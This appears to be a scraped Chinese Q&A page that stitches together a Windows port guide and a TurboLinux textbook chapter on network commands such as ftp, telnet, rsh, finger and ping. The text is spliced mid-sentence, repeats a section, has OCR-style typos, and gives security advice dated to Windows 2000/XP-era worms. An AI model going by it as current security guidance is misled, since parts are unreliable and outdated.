finger網路異常介面401

『壹』 如何打開和關閉埠

關閉/開啟埠
在介紹各種埠的作用前，這里先介紹一下在Windows中如何關閉/打開埠，因為默認的情況下，有很多不安全的或沒有什麼用的埠是開啟的，比如Telnet服務的23埠、FTP服務的21埠、SMTP服務的25埠、RPC服務的135埠等等。為了保證系統的安全性，我們可以通過下面的方法來關閉/開啟埠。

關閉埠
比如在Windows 2000/XP中關閉SMTP服務的25埠，可以這樣做：首先打開「控制面板」，雙擊「管理工具」，再雙擊「服務」。接著在打開的服務窗口中找到並雙擊「Simple Mail Transfer Protocol （SMTP）」服務，單擊「停止」按鈕來停止該服務，然後在「啟動類型」中選擇「已禁用」，最後單擊「確定」按鈕即可。這樣，關閉了SMTP服務就相當於關閉了對應的埠。

開啟埠
如果要開啟該埠只要先在「啟動類型」選擇「自動」，單擊「確定」按鈕，再打開該服務，在「服務狀態」中單擊「啟動」按鈕即可啟用該埠，最後，單擊「確定」按鈕即可。

21埠：21埠主要用於FTP（File Transfer Protocol，文件傳輸協議）服務。 23埠：23埠主要用於Telnet（遠程登錄）服務，是Internet上普遍採用的登錄和模擬程序。 25埠：25埠為SMTP（Simple Mail Transfer Protocol，簡單郵件傳輸協議）伺服器所開放，主要用於發送郵件，如今絕大多數郵件伺服器都使用該協議。 53埠：53埠為DNS（Domain Name Server，域名伺服器）伺服器所開放，主要用於域名解析，DNS服務在NT系統中使用的最為廣泛。 67、68埠：67、68埠分別是為Bootp服務的Bootstrap Protocol Server（引導程序協議服務端）和Bootstrap Protocol Client（引導程序協議客戶端）開放的埠。 69埠：TFTP是Cisco公司開發的一個簡單文件傳輸協議，類似於FTP。 79埠：79埠是為Finger服務開放的，主要用於查詢遠程主機在線用戶、操作系統類型以及是否緩沖區溢出等用戶的詳細信息。 80埠：80埠是為HTTP（HyperText Transport Protocol，超文本傳輸協議）開放的，這是上網沖浪使用最多的協議，主要用於在WWW（World Wide Web，萬維網）服務上傳輸信息的協議。 99埠：99埠是用於一個名為「Metagram Relay」（亞對策延時）的服務，該服務比較少見，一般是用不到的。 109、110埠：109埠是為POP2（Post Office Protocol Version 2，郵局協議2）服務開放的，110埠是為POP3（郵件協議3）服務開放的，POP2、POP3都是主要用於接收郵件的。 111埠：111埠是SUN公司的RPC（Remote Procere Call，遠程過程調用）服務所開放的埠，主要用於分布式系統中不同計算機的內部進程通信，RPC在多種網路服務中都是很重要的組件。 113埠：113埠主要用於Windows的「Authentication Service」（驗證服務）。 119埠：119埠是為「Network News Transfer Protocol」（網路新聞組傳輸協議，簡稱NNTP）開放的。 135埠：135埠主要用於使用RPC（Remote Procere Call，遠程過程調用）協議並提供DCOM（分布式組件對象模型）服務。 137埠：137埠主要用於「NetBIOS Name Service」（NetBIOS名稱服務）。 139埠：139埠是為「NetBIOS Session Service」提供的，主要用於提供Windows文件和列印機共享以及Unix中的Samba服務。 143埠：143埠主要是用於「Internet Message Access Protocol」v2（Internet消息訪問協議，簡稱IMAP）。 161埠：161埠是用於「Simple Network Management Protocol」（簡單網路管理協議，簡稱SNMP）。 443埠：43埠即網頁瀏覽埠，主要是用於HTTPS服務，是提供加密和通過安全埠傳輸的另一種HTTP。 554埠：554埠默認情況下用於「Real Time Streaming Protocol」（實時流協議，簡稱RTSP）。 1024埠：1024埠一般不固定分配給某個服務，在英文中的解釋是「Reserved」（保留）。 1080埠：1080埠是Socks代理服務使用的埠，大家平時上網使用的WWW服務使用的是HTTP協議的代理服務。 1755埠：1755埠默認情況下用於「Microsoft Media Server」（微軟媒體伺服器，簡稱MMS）。 4000埠：4000埠是用於大家經常使用的QQ聊天工具的，再細說就是為QQ客戶端開放的埠，QQ服務端使用的埠是8000。 5554埠：在今年4月30日就報道出現了一種針對微軟lsass服務的新蠕蟲病毒——震盪波（Worm.Sasser），該病毒可以利用TCP 5554埠開啟一個FTP服務，主要被用於病毒的傳播。 5632埠：5632埠是被大家所熟悉的遠程式控制制軟體pcAnywhere所開啟的埠。 8080埠：8080埠同80埠，是被用於WWW代理服務的，可以實現網頁埠概念 在網路技術中，埠（Port）大致有兩種意思：一是物理意義上的埠，比如，ADSL Modem、集線器、交換機、路由器用於連接其他網路設備的介面，如RJ-45埠、SC埠等等。二是邏輯意義上的埠，一般是指TCP/IP協議中的埠，埠號的范圍從0到65535，比如用於瀏覽網頁服務的80埠，用於FTP服務的21埠等等。我們這里將要介紹的就是邏輯意義上的埠。 埠分類 邏輯意義上的埠有多種分類標准，下面將介紹兩種常見的分類： 1. 按埠號分布劃分 （1）知名埠（Well-Known Ports） 知名埠即眾所周知的埠號，范圍從0到1023，這些埠號一般固定分配給一些服務。比如21埠分配給FTP服務，25埠分配給SMTP（簡單郵件傳輸協議）服務，80埠分配給HTTP服務，135埠分配給RPC（遠程過程調用）服務等等。 （2）動態埠（Dynamic Ports） 動態埠的范圍從1024到65535，這些埠號一般不固定分配給某個服務，也就是說許多服務都可以使用這些埠。只要運行的程序向系統提出訪問網路的申請，那麼系統就可以從這些埠號中分配一個供該程序使用。比如1024埠就是分配給第一個向系統發出申請的程序。在關閉程序進程後，就會釋放所佔用的埠號。 不過，動態埠也常常被病毒木馬程序所利用，如冰河默認連接埠是7626、WAY 2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。 2. 按協議類型劃分 按協議類型劃分，可以分為TCP、UDP、IP和ICMP（Internet控制消息協議）等埠。下面主要介紹TCP和UDP埠： （1）TCP埠 TCP埠，即傳輸控制協議埠，需要在客戶端和伺服器之間建立連接，這樣可以提供可靠的數據傳輸。常見的包括FTP服務的21埠，Telnet服務的23埠，SMTP服務的25埠，以及HTTP服務的80埠等等。 （2）UDP埠 UDP埠，即用戶數據包協議埠，無需在客戶端和伺服器之間建立連接，安全性得不到保障。常見的有DNS服務的53埠，SNMP（簡單網路管理協議）服務的161埠，QQ使用的8000和4000埠等等。查看埠 在Windows 2000/XP/Server 2003中要查看埠，可以使用Netstat命令： 依次點擊「開始→運行」，鍵入「cmd」並回車，打開命令提示符窗口。在命令提示符狀態下鍵入「netstat -a -n」，按下回車鍵後就可以看到以數字形式顯示的TCP和UDP連接的埠號及狀態（如圖）。 小知識：Netstat命令用法 命令格式：Netstat －a －e －n －o －s －a 表示顯示所有活動的TCP連接以及計算機監聽的TCP和UDP埠。 －e 表示顯示乙太網發送和接收的位元組數、數據包數等。 －n 表示只以數字形式顯示所有活動的TCP連接的地址和埠號。 －o 表示顯示活動的TCP連接並包括每個連接的進程ID（PID）。 －s 表示按協議顯示各種連接的統計信息，包括埠號。 關閉/開啟埠 在介紹各種埠的作用前，這里先介紹一下在Windows中如何關閉/打開埠，因為默認的情況下，有很多不安全的或沒有什麼用的埠是開啟的，比如Telnet服務的23埠、FTP服務的21埠、SMTP服務的25埠、RPC服務的135埠等等。為了保證系統的安全性，我們可以通過下面的方法來關閉/開啟埠。 關閉埠 比如在Windows 2000/XP中關閉SMTP服務的25埠，可以這樣做：首先打開「控制面板」，雙擊「管理工具」，再雙擊「服務」。接著在打開的服務窗口中找到並雙擊「Simple Mail Transfer Protocol （SMTP）」服務，單擊「停止」按鈕來停止該服務，然後在「啟動類型」中選擇「已禁用」，最後單擊「確定」按鈕即可。這樣，關閉了SMTP服務就相當於關閉了對應的埠。 開啟埠 如果要開啟該埠只要先在「啟動類型」選擇「自動」，單擊「確定」按鈕，再打開該服務，在「服務狀態」中單擊「啟動」按鈕即可啟用該埠，最後，單擊「確定」按鈕即可。 提示：在Windows 98中沒有「服務」選項，你可以使用防火牆的規則設置功能來關閉/開啟埠。 79埠 埠說明：79埠是為Finger服務開放的，主要用於查詢遠程主機在線用戶、操作系統類型以及是否緩沖區溢出等用戶的詳細信息。比如要顯示遠程計算機www.abc.com上的user01用戶的信息，可以在命令行中鍵入「finger [email protected]」即可。 埠漏洞：一般黑客要攻擊對方的計算機，都是通過相應的埠掃描工具來獲得相關信息，比如使用「流光」就可以利用79埠來掃描遠程計算機操作系統版本，獲得用戶信息，還能探測已知的緩沖區溢出錯誤。這樣，就容易遭遇到黑客的攻擊。而且，79埠還被Firehotcker木馬作為默認的埠。 操作建議：建議關閉該埠。 80埠 埠說明：80埠是為HTTP（HyperText Transport Protocol，超文本傳輸協議）開放的，這是上網沖浪使用最多的協議，主要用於在WWW（World Wide Web，萬維網）服務上傳輸信息的協議。我們可以通過HTTP地址加「:80」（即常說的「網址」）來訪問網站的，比如http://www.cce.com.cn:80，因為瀏覽網頁服務默認的埠號是80，所以只要輸入網址，不用輸入「:80」。 埠漏洞：有些木馬程序可以利用80埠來攻擊計算機的，比如Executor、RingZero等。 操作建議：為了能正常上網沖浪，我們必須開啟80埠。 109與110埠 埠說明：109埠是為POP2（Post Office Protocol Version 2，郵局協議2）服務開放的，110埠是為POP3（郵件協議3）服務開放的，POP2、POP3都是主要用於接收郵件的，目前POP3使用的比較多，許多伺服器都同時支持POP2和POP3。客戶端可以使用POP3協議來訪問服務端的郵件服務，如今ISP的絕大多數郵件伺服器都是使用該協議。在使用電子郵件客戶端程序的時候，會要求輸入POP3伺服器地址，默認情況下使用的就是110埠（如圖）。 埠漏洞：POP2、POP3在提供郵件接收服務的同時，也出現了不少的漏洞。單單POP3服務在用戶名和密碼交換緩沖區溢出的漏洞就不少於20個，比如WebEasyMail POP3 Server合法用戶名信息泄露漏洞，通過該漏洞遠程攻擊者可以驗證用戶賬戶的存在。另外，110埠也被ProMail trojan等木馬程序所利用，通過110埠可以竊取POP賬號用戶名和密碼。 操作建議：如果是執行郵件伺服器，可以打開該埠。 135埠 埠說明：135埠主要用於使用RPC（Remote Procere Call，遠程過程調用）協議並提供DCOM（分布式組件對象模型）服務，通過RPC可以保證在一台計算機上運行的程序可以順利地執行遠程計算機上的代碼；使用DCOM可以通過網路直接進行通信，能夠跨包括HTTP協議在內的多種網路傳輸。 埠漏洞：相信去年很多Windows 2000和Windows XP用戶都中了「沖擊波」病毒，該病毒就是利用RPC漏洞來攻擊計算機的。RPC本身在處理通過TCP/IP的消息交換部分有一個漏洞，該漏洞是由於錯誤地處理格式不正確的消息造成的。該漏洞會影響到RPC與DCOM之間的一個介面，該介面偵聽的埠就是135。 操作建議：為了避免「沖擊波」病毒的攻擊，建議關閉該埠 137埠 埠說明：137埠主要用於「NetBIOS Name Service」（NetBIOS名稱服務），屬於UDP埠，使用者只需要向區域網或互聯網上的某台計算機的137埠發送一個請求，就可以獲取該計算機的名稱、注冊用戶名，以及是否安裝主域控制器、IIS是否正在運行等信息。 埠漏洞：因為是UDP埠，對於攻擊者來說，通過發送請求很容易就獲取目標計算機的相關信息，有些信息是直接可以被利用，並分析漏洞的，比如IIS服務。另外，通過捕獲正在利用137埠進行通信的信息包，還可能得到目標計算機的啟動和關閉的時間，這樣就可以利用專門的工具來攻擊。 操作建議：建議關閉該埠。 139埠 埠說明：139埠是為「NetBIOS Session Service」提供的，主要用於提供Windows文件和列印機共享以及Unix中的Samba服務。在Windows中要在區域網中進行文件的共享，必須使用該服務。比如在Windows 98中，可以打開「控制面板」，雙擊「網路」圖標，在「配置」選項卡中單擊「文件及列印共享」按鈕選中相應的設置就可以安裝啟用該服務；在Windows 2000/XP中，可以打開「控制面板」，雙擊「網路連接」圖標，打開本地連接屬性；接著，在屬性窗口的「常規」選項卡中選擇「Internet協議（TCP/IP）」，單擊「屬性」按鈕；然後在打開的窗口中，單擊「高級」按鈕；在「高級TCP/IP設置」窗口中選擇「WINS」選項卡，在「NetBIOS設置」區域中啟用TCP/IP上的NetBIOS。 埠漏洞：開啟139埠雖然可以提供共享服務，但是常常被攻擊者所利用進行攻擊，比如使用流光、SuperScan等埠掃描工具，可以掃描目標計算機的139埠，如果發現有漏洞，可以試圖獲取用戶名和密碼，這是非常危險的.

『貳』 寫出網路測試常用方法列出幾個常見的網路操作命令，並解釋其作用。

計算機網路的主要優點是能夠實現資源和信息的共享，並且用戶可以遠程訪問信息。Linux提供了一組強有力的網路命令來為用戶服務，這些工具能夠幫助用戶登錄到遠程計算機上、傳輸文件和執行遠程命令等。

本章介紹下列幾個常用的有關網路操作的命令：

ftp 傳輸文件

telnet 登錄到遠程計算機上

r - 使用各種遠程命令

netstat 查看網路的狀況

nslookup 查詢域名和IP地址的對應

finger 查詢某個使用者的信息

ping 查詢某個機器是否在工作

使用ftp命令進行遠程文件傳輸

ftp命令是標準的文件傳輸協議的用戶介面。ftp是在TCP/IP網路上的計算機之間傳輸文件的簡單有效的方法。它允許用戶傳輸ASCII文件和二進制文件。

在ftp會話過程中，用戶可以通過使用ftp客戶程序連接到另一台計算機上。從此，用戶可以在目錄中上下移動、列出目錄內容、把文件從遠程機拷貝到本地機上、把文件從本地機傳輸到遠程系統中。需要注意的是，如果用戶沒有那個文件的存取許可權，就不能從遠程系統中獲得文件或向遠程系統傳輸文件。

為了使用ftp來傳輸文件，用戶必須知道遠程計算機上的合法用戶名和口令。這個用戶名/口令的組合用來確認ftp 會話，並用來確定用戶對要傳輸的文件可以進行什麼樣的訪問。另外，用戶顯然需要知道對其進行ftp 會話的計算機的名字或IP地址。

Ftp命令的功能是在本地機和遠程機之間傳送文件。該命令的一般格式如下：

$ ftp 主機名/IP

其中「主機名/IP」是所要連接的遠程機的主機名或IP地址。在命令行中，主機名屬於選項，如果指定主機名，ftp將試圖與遠程機的ftp服務程序進行連接；如果沒有指定主機名，ftp將給出提示符，等待用戶輸入命令：

$ ftp

ftp >

此時在ftp>提示符後面輸入open命令加主機名或IP地址，將試圖連接指定的主機。

不管使用哪一種方法，如果連接成功，需要在遠程機上登錄。用戶如果在遠程機上有帳號，就可以通過ftp使用這一帳號並需要提供口令。在遠程機上的用戶帳號的讀寫許可權決定該用戶在遠程機上能下載什麼文件和將上載文件放到哪個目錄中。

如果沒有遠程機的專用登錄帳號，許多ftp站點設有可以使用的特殊帳號。這個帳號的登錄名為anonymous（也稱為匿名ftp），當使用這一帳號時，要求輸入email地址作為口令。

如果遠程系統提供匿名ftp服務，用戶使用這項服務可以登錄到特殊的，供公開使用的目錄。一般專門提供兩個目錄：pub目錄和incoming目錄。pub目錄包含該站點供公眾使用的所有文件，incoming目錄存放上載到該站點的文件。

一旦用戶使用ftp在遠程站點上登錄成功，將得到「ftp>」提示符。現在可以自由使用ftp提供的命令，可以用 help命令取得可供使用的命令清單，也可以在 help命令後面指定具體的命令名稱，獲得這條命令的說明。

最常用的命令有：

ls 列出遠程機的當前目錄

cd 在遠程機上改變工作目錄

lcd 在本地機上改變工作目錄

ascii 設置文件傳輸方式為ASCII模式

binary 設置文件傳輸方式為二進制模式

close 終止當前的ftp會話

hash 每次傳輸完數據緩沖區中的數據後就顯示一個#號

get（mget） 從遠程機傳送指定文件到本地機

put（mput） 從本地機傳送指定文件到遠程機

open 連接遠程ftp站點

quit 斷開與遠程機的連接並退出ftp

? 顯示本地幫助信息

! 轉到Shell中

下面簡單將ftp常用命令作一簡介。

啟動ftp會話

open命令用於打開一個與遠程主機的會話。該命令的一般格式是：

open 主機名/IP

如果在ftp 會話期間要與一個以上的站點連接，通常只用不帶參數的ftp命令。如果在會話期間只想與一台計算機連接，那麼在命令行上指定遠程主機名或IP地址作為ftp命令的參數。

終止ftp會話

close、disconnect、quit和bye命令用於終止與遠程機的會話。close和disronnect命令關閉與遠程機的連接，但是使用戶留在本地計算機的ftp程序中。quit和bye命令都關閉用戶與遠程機的連接，然後退出用戶機上的ftp 程序。

改變目錄

「cd [目錄]」命令用於在ftp會話期間改變遠程機上的目錄，lcd命令改變本地目錄，使用戶能指定查找或放置本地文件的位置。

遠程目錄列表

ls命令列出遠程目錄的內容，就像使用一個交互shell中的ls命令一樣。ls命令的一般格式是：

ls [目錄] [本地文件]

如果指定了目錄作為參數，那麼ls就列出該目錄的內容。如果給出一個本地文件的名字，那麼這個目錄列表被放入本地機上您指定的這個文件中。

從遠程系統獲取文件

get和mget命令用於從遠程機上獲取文件。get命令的一般格式為：

get 文件名

您還可以給出本地文件名，這個文件名是這個要獲取的文件在您的本地機上創建時的文件名。如果您不給出一個本地文件名，那麼就使用遠程文件原來的名字。

mget命令一次獲取多個遠程文件。mget命令的一般格式為：

mget 文件名列表

使用用空格分隔的或帶通配符的文件名列表來指定要獲取的文件，對其中的每個文件都要求用戶確認是否傳送。

向遠程系統發送文件

put和mput命令用於向遠程機發送文件。Put命令的一般格式為：

put 文件名

mput命令一次發送多個本地文件，mput命令的一般格式為：

mput 文件名列表

使用用空格分隔的或帶通配符的文件名列表來指定要發送的文件。對其中的每個文件都要求用戶確認是否發送。

改變文件傳輸模式

默認情況下，ftp按ASCII模式傳輸文件，用戶也可以指定其他模式。ascii和brinary命令的功能是設置傳輸的模式。用ASCII模式傳輸文件對純文本是非常好的，但為避免對二進制文件的破壞，用戶可以以二進制模式傳輸文件。

檢查傳輸狀態

傳輸大型文件時，可能會發現讓ftp提供關於傳輸情況的反饋信息是非常有用的。hash命令使ftp在每次傳輸完數據緩沖區中的數據後，就在屏幕上列印一個#字元。本命令在發送和接收文件時都可以使用。

ftp中的本地命令

當您使用ftp時，字元「!」用於向本地機上的命令shell傳送一個命令。如果用戶處在ftp會話中，需要shell做某些事，就很有用。例如用戶要建立一個目錄來保存接收到的文件。如果輸入!mkdir new_dir，那麼Linux就在用戶當前的本地目錄中創建一個名為new_dir 的目錄。

從遠程機grunthos下載二進制數據文件的典型對話過程如下：

$ ftp grunthos

Connected to grunthos

220 grunthos ftp server

Name （grunthosc）: anonymous

33l Guest login ok, send your complete e-mail address as password.

Password:

230 Guest 1ogin ok, access restrictions apply.

Remote system type is UNIX.

ftp > cd pub

250 CWD command successful.

ftp > ls

200 PORT command successful.

l50 opening ASCII mode data connection for /bin/1s.

total ll4

rog1

rog2

226 Transfer comp1ete .

ftp > binary

200 type set to I.

ftp > hash

Hash mark printing on （1024 bytes/hash mark）.

ftp > get rog1

200 PORT command successfu1.

150 opening BINARY mode data connection for rogl （l4684 bytes）.

# # # # # # # # # # # # #

226 Transfer complete.

14684 bytes received in 0.0473 secs （3e + 02 Kbytes/sec）

ftp > quit

22l Goodbye.

使用telnet命令訪問遠程計算機

用戶使用telnet命令進行遠程登錄。該命令允許用戶使用telnet協議在遠程計算機之間進行通信，用戶可以通過網路在遠程計算機上登錄，就像登錄到本地機上執行命令一樣。

為了通過telnet登錄到遠程計算機上，必須知道遠程機上的合法用戶名和口令。雖然有些系統確實為遠程用戶提供登錄功能，但出於對安全的考慮，要限制來賓的操作許可權，因此，這種情況下能使用的功能是很少的。當允許遠程用戶登錄時，系統通常把這些用戶放在一個受限制的shell中，以防系統被懷有惡意的或不小心的用戶破壞。

用戶還可以使用telnet從遠程站點登錄到自己的計算機上，檢查電子郵件、編輯文件和運行程序，就像在本地登錄一樣。但是，用戶只能使用基於終端的環境而不是X Wndows環境，telnet只為普通終端提供終端模擬，而不支持 X Wndow等圖形環境。

telnet命令的一般形式為：

telnet 主機名/IP

其中「主機名/IP」是要連接的遠程機的主機名或IP地址。如果這一命令執行成功，將從遠程機上得到login：提示符。

使用telnet命令登錄的過程如下：

$ telnet 主機名/IP

啟動telnet會話。

一旦telnet成功地連接到遠程系統上，就顯示登錄信息並提示用戶輸人用戶名和口令。如果用戶名和口令輸入正確，就能成功登錄並在遠程系統上工作。

在telnet提示符後面可以輸入很多命令，用來控制telnet會話過程，在telnet聯機幫助手冊中對這些命令有詳細的說明。

下面是一台Linux計算機上的telnet會話舉例：

$ telnet server. somewhere. com

Trying 127.0.0.1…

Connected to serve. somewhere. com.

Escape character is '?]'.

「TurboLinux release 4. 0 （Colgate）

kernel 2.0.18 on an I486

login: bubba

password:

Last login:Mon Nov l5 20:50:43 for localhost

Linux 2. 0.6. （Posix）.

server: ~$

server: ~$ logout

Connection closed by foreign host

$

用戶結束了遠程會話後，一定要確保使用logout命令退出遠程系統。然後telnet報告遠程會話被關閉，並返回到用戶的本地機的Shell提示符下。

r-系列命令

除ftp和telnet以外，還可以使用r-系列命令訪問遠程計算機和在網路上交換文件。

使用r-系列命令需要特別注意，因為如果用戶不小心，就會造成嚴重的安全漏洞。用戶發出一個r-系列命令後，遠程系統檢查名為/etc/hosts.equiv的文件，以查看用戶的主機是否列在這個文件中。如果它沒有找到用戶的主機，就檢查遠程機上同名用戶的主目錄中名為．rhosts的文件，看是否包括該用戶的主機。如果該用戶的主機包括在這兩個文件中的任何一個之中，該用戶執行r-系列命令就不用提供口令。

雖然用戶每次訪問遠程機時不用鍵入口令可能是非常方便的，但是它也可能會帶來嚴重的安全問題。我們建議用戶在建立/etc/hosts.equiv和.rhosts文件之前，仔細考慮r-命令隱含的安全問題。

rlogin命令

rlogin 是「remote login」（遠程登錄）的縮寫。該命令與telnet命令很相似，允許用戶啟動遠程系統上的交互命令會話。rlogin 的一般格式是：

rlogin [ -8EKLdx ] [ -e char ] [-k realm ] [ - l username ] host

一般最常用的格式是：

rlogin host

該命令中各選項的含義為：

-8 此選項始終允許8位輸入數據通道。該選項允許發送格式化的ANSI字元和其他的特殊代碼。如果不用這個選項，除非遠端的終止和啟動字元不是或，否則就去掉奇偶校驗位。

-E 停止把任何字元當作轉義字元。當和-8選項一起使用時，它提供一個完全的透明連接。

-K 關閉所有的Kerberos確認。只有與使用Kerberos 確認協議的主機連接時才使用這個選項。

-L 允許rlogin會話在litout模式中運行。要了解更多信息，請查閱tty聯機幫助。

-d 打開與遠程主機進行通信的TCP sockets的socket調試。要了解更多信息，請查閱setsockopt的聯機幫助。

-e 為rlogin會話設置轉義字元，默認的轉義字元是「~」，用戶可以指定一個文字字元或一個\nnn形式的八進制數。

-k 請求rlogin獲得在指定區域內的遠程主機的Kerberos許可，而不是獲得由krb_realmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos 許可。

-x 為所有通過rlogin會話傳送的數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。

rsh命令

rsh是「remote shell」（遠程 shell）的縮寫。 該命令在指定的遠程主機上啟動一個shell並執行用戶在rsh命令行中指定的命令。如果用戶沒有給出要執行的命令，rsh就用rlogin命令使用戶登錄到遠程機上。

rsh命令的一般格式是：

rsh [-Kdnx] [-k realm] [-l username] host [command]

一般常用的格式是：

rsh host [command ]

command可以是從shell提示符下鍵人的任何Linux命令。

rsh命令中各選項的含義如下：

-K 關閉所有的Kerbero確認。該選項只在與使用Kerbero確認的主機連接時才使用。

-d 打開與遠程主機進行通信的TCP sockets的socket調試。要了解更多的信息，請查閱setsockopt的聯機幫助。

-k 請求rsh獲得在指定區域內的遠程主機的Kerberos許可，而不是獲得由krb_relmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos許可。

-l 預設情況下，遠程用戶名與本地用戶名相同。本選項允許指定遠程用戶名，如果指定了遠程用戶名，則使用Kerberos 確認，與在rlogin命令中一樣。

-n 重定向來自特殊設備/dev/null的輸入。

-x 為傳送的所有數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。

Linux把標准輸入放入rsh命令中,並把它拷貝到要遠程執行的命令的標准輸入中。它把遠程命令的標准輸出拷貝到rsh的標准輸出中。它還把遠程標准錯誤拷貝到本地標准錯誤文件中。任何退出、中止和中斷信號都被送到遠程命令中。當遠程命令終止了，rsh也就終止了。

rcp命令

rcp代表「remote file 」（遠程文件拷貝）。該命令用於在計算機之間拷貝文件。

rcp命令有兩種格式。第一種格式用於文件到文件的拷貝；第二種格式用於把文件或目錄拷貝到另一個目錄中。rcp命令的一般格式是：

rcp [-px] [-k realm] file1 file2

rcp [-px] [-r] [-k realm] file directory

每個文件或目錄參數既可以是遠程文件名也可以是本地文件名。遠程文件名具有如下形式：rname@rhost：path，其中rname是遠程用戶名，rhost是遠程計算機名，path是這個文件的路徑。

rcp命令的各選項含義如下：

-r 遞歸地把源目錄中的所有內容拷貝到目的目錄中。要使用這個選項，目的必須是一個目錄。

-p 試圖保留源文件的修改時間和模式，忽略umask。

-k 請求rcp獲得在指定區域內的遠程主機的Kerberos 許可，而不是獲得由krb_relmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos許可。

-x 為傳送的所有數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。

如果在文件名中指定的路徑不是完整的路徑名，那麼這個路徑被解釋為相對遠程機上同名用戶的主目錄。如果沒有給出遠程用戶名，就使用當前用戶名。如果遠程機上的路徑包含特殊shell字元，需要用反斜線（\）、雙引號（」）或單引號（』）括起來，使所有的shell元字元都能被遠程地解釋。

需要說明的是，rcp不提示輸入口令，它通過rsh命令來執行拷貝。

netstat命令的功能是顯示網路連接、路由表和網路介面信息，可以讓用戶得知目前都有哪些網路連接正在運作。

該命令的一般格式為：

netstat [選項]

命令中各選項的含義如下：

-a 顯示所有socket，包括正在監聽的。

-c 每隔1秒就重新顯示一遍，直到用戶中斷它。

-i 顯示所有網路介面的信息，格式同「ifconfig -e」。

-n 以網路IP地址代替名稱，顯示出網路連接情形。

-r 顯示核心路由表，格式同「route -e」。

-t 顯示TCP協議的連接情況。

-u 顯示UDP協議的連接情況。

-v 顯示正在進行的工作。

[例]在本地機上使用netstat命令。

$ netstat

Active Internet connections （w/o servers）

Proto Recv-Q Send-Q Local Address Foreign Address State

Active UNIX domain sockets （w/o servers）

Proto RefCnt Flags Type State I-Node Path

unix 1 [ ] STREAM CONNECTED 270 @00000008

unix 1 [ ] STREAM CONNECTED 150 @00000002

unix 1 [ ] STREAM CONNECTED 104 @00000001

unix 1 [ ] STREAM CONNECTED 222 @00000004

unix 1 [ ] STREAM CONNECTED 171 @00000003

unix 1 [ ] STREAM CONNECTED 271 /dev/log

unix 1 [ ] STREAM CONNECTED 225 /dev/log

unix 1 [ ] STREAM CONNECTED 223 /dev/log

unix 1 [ ] STREAM CONNECTED 203 /dev/log

unix 1 [ ] STREAM CONNECTED 105 /dev/log

……

nslookup命令

nslookup命令的功能是查詢一台機器的IP地址和其對應的域名。它通常需要一台域名伺服器來提供域名服務。如果用戶已經設置好域名伺服器，就可以用這個命令查看不同主機的IP地址對應的域名。

該命令的一般格式為：

nslookup [IP地址/域名]

[例]在本地機上使用nslookup命令。

$ nslookup

Default Server: name.tlc.com.cn

Address: 192.168.1.99

>

在符號「>」後面輸入要查詢的IP地址或域名並回車即可。如果要退出該命令，輸入exit並回車即可。

finger命令

finger命令的功能是查詢用戶的信息，通常會顯示系統中某個用戶的用戶名、主目錄、停滯時間、登錄時間、登錄shell等信息。如果要查詢遠程機上的用戶信息，需要在用戶名後面接「@主機名」，採用[用戶名@主機名]的格式，不過要查詢的網路主機需要運行finger守護進程。

該命令的一般格式為：

finger [選項] [使用者] [用戶@主機]

命令中各選項的含義如下：

-s 顯示用戶的注冊名、實際姓名、終端名稱、寫狀態、停滯時間、登錄時間等信息。

-l 除了用-s選項顯示的信息外，還顯示用戶主目錄、登錄shell、郵件狀態等信息，以及用戶主目錄下的.plan、.project和.forward文件的內容。

-p 除了不顯示.plan文件和.project文件以外，與-l選項相同。

[例]在本地機上使用finger命令。

$ finger xxq

Login: xxq Name:

Directory: /home/xxq Shell: /bin/bash

Last login Thu Jan 1 21:43 （CST） on tty1

No mail.

No Plan.

$ finger

Login Name Tty Idle Login Time Office Office Phone

root root *1 28 Nov 25 09:17

……

ping命令

ping命令用於查看網路上的主機是否在工作，它向該主機發送ICMP ECHO_REQUEST包。有時我們想從網路上的某台主機上下載文件，可是又不知道那台主機是否開著，就需要使用ping命令查看。

該命令的一般格式為：

ping [選項] 主機名/IP地址

命令中各選項的含義如下：

-c 數目 在發送指定數目的包後停止。

-d 設定SO_DEBUG的選項。

-f 大量且快速地送網路封包給一台機器，看它的回應。

-I 秒數 設定間隔幾秒送一個網路封包給一台機器，預設值是一秒送一次。

-l 次數 在指定次數內，以最快的方式送封包數據到指定機器（只有超級用戶可以使用此選項）。

-q 不顯示任何傳送封包的信息，只顯示最後的結果。

-r 不經由網關而直接送封包到一台機器，通常是查看本機的網路介面是否有問題。

-s 位元組數 指定發送的數據位元組數，預設值是56，加上8位元組的ICMP頭，一共是64ICMP數據位元組。

TurboLinux系統提供了大量命令和許多實用工具軟體，本書由於篇幅的關系，主要介紹了TurboLinux的一些常用命令和實用軟體。讀者可以使用系統提供的聯機幫助手冊獲取更多的信息。

TurboLinux系統的聯機手冊中有大量的可用信息，根據其內容分成若干節。在Linux聯機幫助手冊上，幾乎每個命令都有說明。因此，當用戶對於Linux上的一個命令不會用或是不太了解時，就請使用聯機幫助命令。

本章主要介紹幾個常用的聯機幫助命令。包括：

man 查詢每個命令的使用方法

help 查詢Shell命令

whereis 查詢某個命令的位置

locate 查詢某個文件的位置

man命令

這個命令應該是每個Linux系統上都有的。它格式化並顯示在線的手冊頁。通常使用者只要在命令man後，輸入想要獲取的命令的名稱（例如 ls），man就會列出一份完整的說明，其內容包括命令語法、各選項的意義以及相關命令等。

該命令的一般形式為：

man [選項] 命令名稱

命令中各選項的含義分別為：

-M 路徑 指定搜索man手冊頁的路徑，通常這個路徑由環境變數MANPATH預設，如果在命令行上指定另外的路徑，則覆蓋MANPATH的設定。

-P 命令 指定所使用的分頁程序，預設使用/usr/bin/less–is，在環境變數MANPAGER中預設。

-S 章節 由於一個命令名稱可能會有很多類別，至於類別，列出如下：

章節 說明

1 一般使用者的命令

2 系統調用的命令

3 C語言函數庫的命令

4 有關驅動程序和系統設備的解釋

5 配置文件的解釋

6 游戲程序的命令

7 其他的軟體或是程序的命令

有關系統維護的命令

-a 顯示所有的手冊頁，而不是只顯示第一個。

-d 這個選項主要在檢查時使用，如果用戶加入了一個新的文件，就可以用這個選項檢查是否出錯，這個選項並不會列出文件內容。

-f 只顯示出命令的功能而不顯示其中詳細的說明文件。

-p string 設定運行的預先處理程序的順序，共有下列幾項：

e eqn t tbl

g grap r refer

p pic v vgrind

